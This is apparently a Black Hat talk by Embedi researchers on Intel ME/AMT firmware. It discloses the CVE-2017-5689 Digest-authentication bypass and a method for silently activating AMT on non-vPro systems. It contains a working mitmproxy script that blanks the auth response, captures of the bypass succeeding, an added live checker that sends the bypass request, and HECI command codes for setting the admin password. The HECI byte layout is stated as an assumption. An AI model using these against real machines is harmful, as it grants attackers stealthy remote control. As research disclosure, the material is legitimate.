INTEL AMT. STEALTH BREAKTHROUGH - Black Hat


INTEL AMT. STEALTH BREAKTHROUGH
Dmitriy Evdokimov, CTO, Embedi
Alexander Ermolov, Security researcher, Embedi
Maksim Malyutin, Security researcher, Embedi

About us
- Dmitriy Evdokimov, CTO of Embedi, d.evdokimov@embedi.com, @evdokimovds
- Alexander Ermolov, researcher, reverse engineer, and information security expert, a.ermolov@embedi.com, @flothrone
- Maksim Malyutin, programmer who has occasionally ended up dealing with information security, m.malyutin@embedi.com, @jesusfailed

Real-time Q&A
Ask us on Twitter live, during the Black Hat session! Just use the #askaboutintelamt hashtag in your question on Twitter, and we will answer you at once!

Agenda
1. Introduction to Intel 64 system architecture
2. Intel ME/AMT architecture overview
3. Unauthorized remote access to Intel AMT system
4. Spread out
5. Full attack scenario
6. Conclusions

Introduction to Intel 64 system architecture

System architecture overview
The best known execution environments: Intel CPU, Intel ME.
UEFI BIOS and Intel ME firmware (and a few other blobs) are system firmware stored on the common SPI flash memory.

System firmware

Execution privileges

Intel ME/AMT architecture

Intel ME architecture
Intel ME is based on an MCU with ROM and SRAM.
It is the most privileged and hidden execution environment:
- a runtime memory in DRAM, hidden from the CPU
- full access to DRAM
- working even when the CPU is in S5 (system shutdown)
- out-of-band (OOB) access to the network interface
- undocumented communication protocol (MEI)
AMD has a similar technology, presented in 2013: the Platform Security Processor (PSP).

Intel ME presence
Intel ME is integrated into:
- Q-type chipsets since the 960 series (2006)
  o Intel ME 2.x - 5.x
- PCH: any chipset since the 5 series (2010)
  o Intel ME 6.x - 11.x
  o Intel TXE 1.x - 3.x
  o Intel SPS 1.x - 4.x
Its name and firmware implementation are specific to a platform type:
- Desktop/Laptop: Intel Management Engine (ME)
- Server: Intel Server Platform Services (SPS)
- Mobile: Intel Trusted Execution Engine (TXE)

    Chipset                   ME/AMT version
    5 series                  ME 6.x (AMT 6.x)
    6 series                  ME 7.x (AMT 7.x)
    7 series                  ME 8.x (AMT 8.x)
    8 series                  ME 9.x (AMT 9.x)
    9 series                  ME 9.5.x/10.x (AMT 9.5.x/10.x)
    100 series, 200 series    ME 11.x (AMT 11.x)

Intel ME RE problems
- Unknown ME ROM contents on production systems
  o ME ROM images can be found inside Intel ME firmware pre-production debug images (used for the debug ROM bypass capability)
- Code is partially compressed with Huffman, but the dictionary is unknown
  o There is a reconstructed dictionary for ME 6.x - 10.x firmware (see unhuffme)
- Undocumented MEI communication protocol
  o Some details are already reconstructed (see me_heci.py)
- Inaccessible ME UMA
- No method to disable Intel ME
  o But there are ways to cut out unnecessary firmware components (see me_cleaner.py)

Reversing Intel ME
- me_unpack.py: parse Intel ME firmware images and extract all partitions/modules
- me_util.py: send commands to Intel ME through HECI
- Intelmetool: check Intel ME status through HECI
- unhuffme: unpack Huffman-compressed modules from Intel ME firmware images 6.x - 10.x
- MEAnalyzer: a tool to analyze Intel ME firmware images
- unME11: unpack some Huffman-compressed modules from Intel ME firmware 11.x

Useful links
- "Rootkit in your laptop", Igor Skochinsky
- "Intel ME: The Way of the Static Analysis", Dmitry Sklyarov
- A. Kumar, "Active Platform Management Demystified: Unleashing the Power of Intel vPro (TM) Technology", 2009, Intel Press.
- Xiaoyu Ruan, "Platform Embedded Security Technology Revealed: Safeguarding the Future of Computing with Intel Embedded Security and Management Engine", 2014, APress.

Intel ME firmware components
The main firmware components are:
- bringup module
- kernel
- drivers and services (to support timers, network, heci, ...)
- the applications that implement different Intel technologies: PTT, AMT, ...
Depending on the technologies applied, the firmware types are:
- Ignition firmware (ME 6.x only): the minimal contents
- 1.5MB firmware: not the full module contents
- 5MB firmware: full firmware contents

Intel AMT Architecture
Intel AMT is an application inside the Intel ME firmware.
Intel AMT features: Web-Interface, SOL, IDE-R, KVM.
It is a part of the "vPro" brand, so it is officially supported on vPro-marked systems. Usually these systems have Q-type chipsets.

AMT feature list (* possibly interesting for an attacker, ** interesting for an attacker):
- Access Control List (ACL) Management
- Access Monitor**
- Agent Presence
- Alarm Clock
- Boot Control
- Certificate Management
- Discovery*
- Event Manager
- Hardware Assets**
- KVM Configuration**
- Network Administration
- Power
- Power Packages**
- Redirection (SOL and USB-R)
- Remote Access
- Storage**
- Storage File System*
- System Defense
- Time Synchronization
- User Consent*
- Wireless

Intel AMT Access
Intel AMT features can be accessed via a network or a local interface.
Intel AMT has two types of interfaces: network interfaces (Intel AMT Releases 2.5, 2.6, 4.0, and 6.0 and later releases support a wireless, along with a wired, network interface) and a local interface.
TCP/UDP messages addressed to certain registered ports are routed to Intel AMT when those ports are enabled. Messages received on a wired LAN interface go directly to Intel AMT.
Local applications can communicate with the Intel ME the same way network applications do: WS-Management over SOAP over HTTP. This can be done using the Local Manageability Service (LMS).

Intel AMT network ports
- 5900: AMT VNC-server without encryption
- 16992: AMT web-server, HTTP protocol
- 16993: AMT web-server, HTTPS protocol
- 16994: AMT redirection for SOL, IDE-R, KVM without encryption
- 16995: AMT redirection for SOL, IDE-R, KVM with TLS
Intel AMT authentication options: Digest, Kerberos
Source: AMT Implementation and Reference Guide, "Manageability Ports"

Unauthorized remote access to Intel AMT system

Intel AMT logon page
When accessed through a regular web-browser, Intel AMT redirects us to a logon page and challenges us for a password.

Digest Authentication in Intel AMT
As per RFC 2617, the first time the client requests the document, no Authorization header field is sent, so the server responds with 401 Unauthorized:

    $ mitmdump -p 8080 -dd
    Proxy server listening at http://0.0.0.0:8080
    127.0.0.1:50186: clientconnect
    >> GET http://192.168.1.1:16992/index.htm
       Host: 192.168.1.1:16992
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Connection: keep-alive
       Upgrade-Insecure-Requests: 1
    << 401 Unauthorized 689b
       WWW-Authenticate: Digest realm="Digest:C8090000000000000000000000000000", nonce=" 9GoAAZEAACYo Ka4uJ0dCwoKCxAtTP2", stale="false", qop="auth"
       Content-Type: text/html
       Server: Intel(R) Active Management Technology 9.0.30
       Content-Length: 689
       Connection: close
    127.0.0.1:50186: clientdisconnect

Digest Authentication in Intel AMT
When given a username and password, the client responds with a new request, including the Authorization header field:

    127.0.0.1:50190: clientconnect
    >> GET http://192.168.1.1:16992/index.htm
       Host: 192.168.1.1:16992
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Connection: keep-alive
       Upgrade-Insecure-Requests: 1
       Authorization: Digest username="admin", realm="Digest:C8090000000000000000000000000000", nonce="JOKoAAdFAAApQD4w/l 88v4fscE6y2Ke", uri="/index.htm", response="7a8df4aa68a83ba59855d7a433522cf7", qop=auth, nc=00000001, cnonce="6e8da33dda6b05d8"
    << 200 OK 2.42k
       Date: Wed, 5 Jul 2017 20:07:21 GMT
       Server: Intel(R) Active Management Technology 9.0.30
       Content-Type: text/html
       Transfer-Encoding: chunked
       Cache-Control: no cache
       Expires: Thu, 26 Oct 1995 00:00:00 GMT

Digest Authentication in Intel AMT
Note the names of the fields sent in the Authorization header of the exchange above (username, realm, nonce, uri, response, qop, nc, cnonce). These strings will help us to pin-point the auth-related functionality in the actual ME firmware.

Reversing web-server
Probably the easiest way to start digging into ME firmware prior to 10.x would be like:

    $ git clone https://github.com/embedi/meloader.git
    $ cd meloader
    $ ln -s meloader.py /your-ida-place/loaders
    $ ln -s meloader /your-ida-place/loaders
    $ idaq 9.0.30.1482_5MB_PRD_RGN.bin

Reversing web-server
...which will result in the firmware image loaded into IDA (screenshot on the slide).

Reversing web-server
A quick search for the "cnonce" string yields this (screenshot on the slide):

Reversing web-server
Let's now look closer at the actual code of the NETSTACK_CODE:20431E74() subroutine:

    ; NETSTACK_CODE:20431ED4
    add     r13, sp, 0x7C
    mov     r0, r17
    mov     r1, r18
    add     r2, r14, (aResponse_0 - aUsername)   # "response"
    add     r3, r13, 0x24                        # R3 = SP+0xA0 = &response
    bl      NETSTACK_AuthGetValue
    cmp     r0, 0
    bne     error

The part where the call to strncmp() occurs seems most interesting here:

    /* NETSTACK_CODE:20431FC8 */
    if (strncmp(computed_response, response.value, response.length)) {
        goto error;
    }
    return 0;

    ; NETSTACK_CODE:20431FC8
    ld      r1, [sp, 0x10C+user_response]
    mov     r0, r13                              # computed_response
    ld      r2, [sp, 0xA4]                       # response.length
    bl      RAPI_strncmp
    cmp     r0, 0
    bne     error
    mov     r0, 0                                # zero means success!
    add     sp, sp, 0x108
    b       RAPI_20000DA4                        # ret

The third argument of strncmp() is the length of the "response" value taken from the client's Authorization header, not the length of the digest the firmware computed. Given an empty string, that length is 0, strncmp() compares nothing and returns zero, and the empty response is accepted as a valid one!
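To make the comparison bug concrete, here is an added Python model (not code from the slides, and not the ME firmware's code) of the check above. It computes the RFC 2617 request-digest the way the AMT web server has to, then compares it once the way the firmware does (strncmp bounded by the client-supplied length) and once the way it should. The realm, URI and nonce are taken from the captures; the cnonce, user name and password are constructed for the example.

```python
import hashlib
import hmac

# Constructed parameters. Realm, URI and nonce are from the page's captures;
# cnonce, user name and password below are made up for this example.
REALM = "Digest:C8090000000000000000000000000000"
NONCE = "efoAAQdGAADhoXdHX8P3u0jsI18jLaZN"
CNONCE = "6e8da33dda6b05d8"
URI = "/index.htm"
NC = "00000001"
QOP = "auth"


def _md5hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username: str, password: str, method: str = "GET",
                    uri: str = URI, realm: str = REALM, nonce: str = NONCE,
                    nc: str = NC, cnonce: str = CNONCE, qop: str = QOP) -> str:
    """RFC 2617 request-digest for qop=auth:
    MD5(HA1 ":" nonce ":" nc ":" cnonce ":" qop ":" HA2), a 32-hex-digit string."""
    ha1 = _md5hex(f"{username}:{realm}:{password}")
    ha2 = _md5hex(f"{method}:{uri}")
    return _md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def vulnerable_compare(computed: str, user_response: str) -> bool:
    """Model of NETSTACK_CODE:20431FC8: strncmp(computed, user_response, n) == 0
    with n = length of the attacker-supplied response field. strncmp compares at
    most n characters, so n == 0 compares nothing and reports equality."""
    n = len(user_response)
    return computed[:n] == user_response[:n]


def fixed_compare(computed: str, user_response: str) -> bool:
    """Reject anything that is not exactly the expected digest: check the length
    against the computed value (not the client's), then compare in constant time."""
    if len(user_response) != len(computed):
        return False
    return hmac.compare_digest(computed.encode(), user_response.encode())


def server_accepts(compare, username: str, password: str, user_response: str) -> bool:
    """What the AMT web server decides for a given Authorization 'response' field,
    given the stored password for that user."""
    computed = digest_response(username, password)
    return compare(computed, user_response)


if __name__ == "__main__":
    good = digest_response("admin", "P@ssw0rd")
    for label, cmp in (("vulnerable", vulnerable_compare), ("fixed", fixed_compare)):
        print(label,
              "valid digest:", server_accepts(cmp, "admin", "P@ssw0rd", good),
              "empty response:", server_accepts(cmp, "admin", "P@ssw0rd", ""))
```

The fixed variant takes the comparison length from the value the server computed, so an empty or shortened client string can never match; in the vulnerable model any string that is a prefix of the real digest also passes, the empty string being the prefix every digest has.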

10 LOC for victory
Once again we will use the mitmproxy tool, but armed with a script that blanks the "response" field of the Authorization header:

    $ cat blank_auth_response.py
    import re

    # mitmproxy 2.x script entry point: return the addon object
    def start():
        return BlankAuthResponse()

    class BlankAuthResponse:
        # matches response="<anything>" inside the Digest Authorization value
        RESPONSE_RE = re.compile('(response=".*?")', flags=re.DOTALL)

        def request(self, flow):
            # only touch traffic to the AMT web-server ports
            if flow.request.port in (16992, 16993):
                if 'Authorization' in flow.request.headers:
                    flow.request.headers['Authorization'] = \
                        self.RESPONSE_RE.sub('response=""', flow.request.headers['Authorization'])

Local proxy script & Intel AMT
Run the local proxy armed with the above-mentioned script, and try to access Intel AMT through this proxy using an obviously incorrect password.

Local proxy script & Intel AMT
As in the previous case, no Authorization header field is sent at first, so the server responds with 401 Unauthorized:

    $ mitmdump -p 8080 -dd --no-http2 -s blank_auth_response.py
    Proxy server listening at http://0.0.0.0:8080
    >> GET http://192.168.1.1:16992/index.htm
       Host: 192.168.1.1:16992
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Referer: http://192.168.1.1:16992/logon.htm
       Connection: keep-alive
       Upgrade-Insecure-Requests: 1
    << 401 Unauthorized 689b
       WWW-Authenticate: Digest realm="Digest:C8090000000000000000000000000000", nonce="efoAAQdGAADhoXdHX8P3u0jsI18jLaZN", stale="false", qop="auth"
       Content-Type: text/html
       Server: Intel(R) Active Management Technology 9.0.30
       Content-Length: 689
       Connection: close

Local proxy script & Intel AMT
But then 200 OK, yay! Note the empty value of the "response" field.

    127.0.0.1:50856: clientconnect
    >> GET http://192.168.1.1:16992/index.htm
       Host: 192.168.1.1:16992
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Authorization: Digest username="admin", realm="Digest:C8090000000000000000000000000000", nonce="cZwGAQdHAACp1IXkfN PXVbcKduiJY6i", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="33366b65c3dc402b"
       Connection: keep-alive
       Upgrade-Insecure-Requests: 1
       Cache-Control: max-age=0
    << 200 OK 2.42k
       Date: Wed, 5 Jul 2017 21:49:31 GMT
       Server: Intel(R) Active Management Technology 9.0.30
       Content-Type: text/html
       Transfer-Encoding: chunked
       Cache-Control: no cache
       Expires: Thu, 26 Oct 1995 00:00:00 GMT

Local proxy script & Intel AMT
Every AMT feature is now available to an attacker, exactly as if they knew the admin password.

Intel bug bounty program

CVE-2017-5689: INTEL-SA-00075 Security Advisory, US-CERT

Exploitation of CVE-2017-5689
There is a vulnerability that allows attackers to log in as the "admin" user in the AMT. The only thing needed is an open 16992/16993 port.
- Doesn't depend on the software installed on the host
- Turned-off devices may be attacked as well
- Some systems are accessible through the Internet
- Attackers can use all the Intel AMT capabilities for their own ends
There are 2 attack methods:
- Local (by using the LMS service)
- Remote (via the open port)
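As an added example (not one of the slides' tools and not from the community scripts mentioned later), here is a standard-library Python checker that performs the two-request exchange the captures show against one AMT host: it fetches /index.htm, parses the Digest challenge from the 401, retries with an Authorization header whose response field is empty, and classifies the host by the second status code. Host and port are inputs; the constant cnonce is a placeholder; the challenge header in the test is the one from the capture above.

```python
import http.client
import re
import ssl

AMT_HTTP_PORT, AMT_HTTPS_PORT = 16992, 16993   # AMT web-server ports listed earlier
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_digest_challenge(header: str) -> dict:
    """Parse the value of 'WWW-Authenticate: Digest realm="...", nonce="...", ...'
    into a dict. Quoted and unquoted parameter values are both accepted."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError(f"not a Digest challenge: {header!r}")
    return {k: (q or u) for k, q, u in _PARAM_RE.findall(params)}


def empty_response_authorization(challenge: dict, uri: str = "/index.htm",
                                 username: str = "admin") -> str:
    """The Authorization header the proxy script produces: every field a normal client
    sends, but response="" instead of the MD5 request-digest. The cnonce is a constant
    placeholder; its value is irrelevant once the response field is empty."""
    fields = [
        f'username="{username}"',
        f'realm="{challenge["realm"]}"',
        f'nonce="{challenge["nonce"]}"',
        f'uri="{uri}"',
        'response=""',
        f'qop={challenge.get("qop", "auth")}',
        "nc=00000001",
        'cnonce="0123456789abcdef"',
    ]
    return "Digest " + ", ".join(fields)


def classify(server_header: str, first_status: int, second_status: int) -> str:
    """AMT answers an unauthenticated GET with 401 plus a Digest challenge; a 200 to
    the empty-response retry is the CVE-2017-5689 condition."""
    if "Intel(R) Active Management Technology" not in server_header:
        return "not-amt"
    if first_status != 401:
        return "no-challenge"
    return "vulnerable" if second_status == 200 else "not-vulnerable"


def check_host(host: str, port: int = AMT_HTTP_PORT, timeout: float = 5.0) -> str:
    """Live check: two GETs to /index.htm, the second carrying the empty-response header."""
    if port == AMT_HTTPS_PORT:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # scanner: accept AMT's own certificate
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", "/index.htm")
    first = conn.getresponse()
    first.read()
    server = first.getheader("Server", "")
    if first.status != 401:
        conn.close()
        return classify(server, first.status, 0)
    challenge = parse_digest_challenge(first.getheader("WWW-Authenticate", ""))
    # http.client reconnects automatically after the 401's "Connection: close"
    conn.request("GET", "/index.htm",
                 headers={"Authorization": empty_response_authorization(challenge)})
    second = conn.getresponse()
    second.read()
    conn.close()
    return classify(server, first.status, second.status)


if __name__ == "__main__":
    import sys
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else AMT_HTTP_PORT
    print(check_host(sys.argv[1], target_port))
```

Run it as `python3 amt_check.py 192.168.1.1 16992` against hosts you are authorized to test; a "vulnerable" result means the second request returned the page without a valid digest, which is exactly the 200 OK seen in the proxy capture.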

Impact of CVE-2017-5689
Shodan, "Intel AMT Report 02-05-2017"

Intel AMT bug & Industrial PC
Security advisory SSA-874235: Intel Vulnerability in Siemens Industrial Products

Demo

After news
Tenable, "Rediscovering the Intel AMT Vulnerability: No PoC, No Patch, No Problem!"
After the details were published, many community tools appeared:
- Nmap script
- Metasploit module
- AMT status checker for Linux
- Tool to disable Intel AMT on Windows
- Detection Script for CVE-2017-5689
- Intel AMT honeypot 1
- Intel AMT honeypot 2

Mitigations
Intel:
- INTEL-SA-00075 Detection and Mitigation Tool
- INTEL-SA-00075 Mitigation Guide

Spread out

The "vPro" can make a difference

    Cheap                               Expensive
    non-vPro                            vPro
    Intel Z/H/B/P-type chipset          Intel Q-type chipsets

What differs: the BIOS (the Intel MEBx module).
What is similar: the Intel ME firmware versions and code.
AMT everywhere**: the 5MB firmware

Intel ME state
What can be done through HECI?
Intel MEI (HECI) can also be used to check the state of the Intel ME subsystem:
- FWSTATUS registers
- Status request to MKHI
- Intel PT

Intel MEI (HECI)
The HECI is used to configure Intel AMT.
HECI PCI CFG points to the HECI MMIO, where the circular buffer window is mapped to send messages to Intel ME and get responses.

Intel MEI (HECI)
HECI is based on the DCMI-HI protocol.
There are clients (code modules) that use HECI inside the Intel ME firmware. To connect to them you need to know the GUID of the client.
Known GUIDs

Intel MEI (HECI)
The message to Intel ME should contain the command description (it specifies the action required from Intel ME). The command is described by the groupID/command fields.
To send the message through the HECI you need to:
1. Connect to the client using the GUID
2. Send a message using the following header:

    struct {
        unsigned groupID;      // the AMTHI client code, 0x12
        unsigned command;      // command code
        unsigned isResponse;
        unsigned reserved;
        unsigned result;
    };

3. Get the acknowledge message

Intel MEI (HECI)
MEI-AMTHI transactions required to activate the AMT:

    Command name     groupID        Command code    Ack code    Description
    AMT_INIT         groupID=0x12   command=0x05    ack=0x85    Network access initialization
    AMT_SET_PWD      groupID=0x12   command=0x09    ack=0x89    Set password for admin user
    AMT_SET_IPV4     groupID=0x12   command=0x0C    ack=0x8C    Set IP address

Attention! Non-vPro systems have no user interface for disabling Intel AMT!

MEI-AMTHI transactions required to deactivate the AMT:

    Command name     groupID        Command code    Ack code    Description
    AMT_UNPROVISION  groupID=0x12   command=0x06    ack=0x86    AMT deactivation (needs reboot)
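The table gives command codes and ack codes but not the byte layout of the header, so here is an added Python packer/parser for it (not code from the slides or from meitools). It assumes the header is one 32-bit little-endian word: groupID in the low byte, the 7-bit command plus the isResponse bit in the next byte, then reserved and result bytes. That layout is an assumption, chosen because it reproduces the table's ack codes (0x05 -> 0x85, 0x0C -> 0x8C) as command | 0x80. The command payloads are not on the page and are not modelled, and treating result == 0 as success is likewise an assumption.

```python
import struct

AMTHI_GROUP_ID = 0x12     # groupID of the AMTHI client, from the table above
RESPONSE_FLAG = 0x80      # ack code = command | 0x80 (0x05 -> 0x85, 0x0C -> 0x8C)

# Command codes from the table. Their payloads are not on the page and are not modelled.
AMT_INIT = 0x05
AMT_UNPROVISION = 0x06
AMT_SET_PWD = 0x09
AMT_SET_IPV4 = 0x0C


def pack_header(group_id: int, command: int, is_response: bool = False,
                result: int = 0) -> bytes:
    """Serialize the header as one little-endian 32-bit word.
    Assumed bit layout (consistent with the ack codes in the table):
    bits 0-7 groupID, bits 8-14 command, bit 15 isResponse,
    bits 16-23 reserved (always 0 here), bits 24-31 result."""
    if not 0 <= command <= 0x7F:
        raise ValueError("command must fit in 7 bits")
    word = ((group_id & 0xFF)
            | ((command & 0x7F) << 8)
            | (int(is_response) << 15)
            | ((result & 0xFF) << 24))
    return struct.pack("<I", word)


def unpack_header(buf: bytes) -> dict:
    """Inverse of pack_header; reads the first four bytes of a MEI message."""
    if len(buf) < 4:
        raise ValueError("header needs 4 bytes")
    (word,) = struct.unpack("<I", buf[:4])
    return {
        "groupID": word & 0xFF,
        "command": (word >> 8) & 0x7F,
        "isResponse": bool((word >> 15) & 1),
        "reserved": (word >> 16) & 0xFF,
        "result": (word >> 24) & 0xFF,
    }


def ack_code(command: int) -> int:
    """The byte the table calls 'ack code': the command with the isResponse bit set."""
    return command | RESPONSE_FLAG


def check_ack(request: bytes, reply: bytes) -> int:
    """Validate that reply acknowledges request (same groupID and command, isResponse
    set) and return its result field. Raises if it is not the matching ack."""
    req, rep = unpack_header(request), unpack_header(reply)
    if (not rep["isResponse"] or rep["groupID"] != req["groupID"]
            or rep["command"] != req["command"]):
        raise ValueError(f"unexpected reply {reply.hex()} for request {request.hex()}")
    return rep["result"]


def activation_sequence() -> list:
    """Header words for the three activation transactions in the table, in order."""
    return [pack_header(AMTHI_GROUP_ID, c) for c in (AMT_INIT, AMT_SET_PWD, AMT_SET_IPV4)]


if __name__ == "__main__":
    for hdr in activation_sequence():
        print(hdr.hex(), unpack_header(hdr))
    print("AMT_UNPROVISION ack byte:", hex(ack_code(AMT_UNPROVISION)))
```

The headers are what a tool like AMTactivator would write into the HECI circular buffer before each command's payload; check_ack is the receive side, which refuses a reply that is not the acknowledgement of the command just sent.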

AMTactivator
AMTactivator consists of:
1. mei.sys: 32-bit kernel driver to work with MEI
2. mei64.sys: 64-bit kernel driver to work with MEI
3. AMTactivator.exe: the application
The workflow:
1. Find the MEI device in the PCI CFG and get the base address of the MEI MMIO.
2. Use the MEI MMIO to send activation/configuration commands to Intel ME.
Code: https://github.com/embedi/meitools

Systems tested:

    Intel ME version   System and chipset                           CPU
    7                  Intel DQ67SW (vPro), Intel Q67               Intel Core i7-2600 (vPro)
    8                  Gigabyte GA-H77-D3H (non-vPro), Intel H77    Intel Core i7-3770 (vPro)
    9                  Gigabyte GA-Q87N (vPro), Intel Q87           Intel Core i3-4300 (non-vPro)
                                                                    Intel Core i5-4590 (vPro)
    9                  Gigabyte GA-H97-D3H (non-vPro), Intel H97    Intel Core i5-4590 (vPro)

Demo 2

Current limitations of AMTactivator
- Only the 6 - 9 Intel desktop chipset series are supported. Successful AMT activation on 100/200 series chipsets has not yet been achieved.
- Intel AMT is configured in Standard Manageability mode (without the KVM feature) if your CPU is non-vPro.
- Intel AMT activation is possible on systems with the Intel ME 5MB firmware (the 1.5MB firmware doesn't have such functionality).
- Windows only; can be ported to Linux.
- Uses our kernel drivers for its operation. Can be implemented to work with the Intel MEI driver as well.

Malware & Intel AMT
- 2015, "How Many Million BIOSes Would you Like to Infect?", Xeno Kovah & Corey Kallenberg
  o Section 6.2, "Network command & control of firmware-level malware"
  o SMM malware: just writing data to a serial port
- 2017, "PLATINUM continues to evolve, find ways to maintain invisibility", Windows Defender Advanced Threat Hunting Team
  o Uses the Intel AMT Serial-over-LAN (SOL) channel for communication
  o Uses the AMT Technology SDK's Redirection Library API (imrsdk.dll): the IMR_SOLSendText()/IMR_SOLReceiveText() functions

Mitigations
- Periodically check that your system doesn't have Intel AMT enabled (network ports)
  o But an attacker could periodically change the state of Intel AMT (enable/disable)
- Uninstall the Intel MEI driver
  o But an attacker could use their own driver to access MEI
- Use the network firewall to block any external requests to the known Intel AMT network ports
  o Not useful for companies that use Intel AMT in their network infrastructure
- Use me_cleaner to cut out the unnecessary functionality from the Intel ME firmware of your system
  o Could brick your system (you will need a hardware programmer to recover)

Spread Out 2

1.5MB FW to 5MB FW
Methods:
- using an SPI flash programmer (if the flash memory regions are locked)
- software way (if the flash memory regions are not locked)
  o through a kernel driver
  o using BIOS vulnerabilities
An obvious limitation: the new FW should fit the SPI flash size.
Systems with 6 - 9 series chipsets: system won't boot (resets during the early phases of the boot process)
Systems with 100 series chipsets: system boots; work in progress

What could an attacker do?
Case 1: The system uses outdated Intel AMT: CVE-2017-5689
Case 2: The system doesn't use Intel AMT: AMTactivator
Case 3: There is no Intel AMT in the system: add Intel AMT functionality by upgrading the 1.5MB firmware to the 5MB firmware
The slide's table maps these three cases onto Intel chipset series 6, 7, 8, 9, 100 and 200; cells marked "?" are not tested.
If you want to give us a hand in testing, please contact us.

Attack scenarios

Takeaways
1. ring -3 firmware (Intel ME/AMT) has security issues.
2. ring -3 hardware (Intel ME/AMT) has undocumented features.
3. A new stealth technique for infecting a computer system.
4. Legit functionality for illegit actions.
One should get used to the idea that attackers' possibilities and Intel AMT capabilities are the same thing. Specifically, attackers can use Intel AMT functionality to achieve their malicious purposes.

THANK YOU FOR YOUR ATTENTION!
CONTACTS:
Website: embedi.com
Telephone: +1 510 323 2636
Email: info@embedi.com
Address: 2001 Addison Street, Berkeley, California 94704

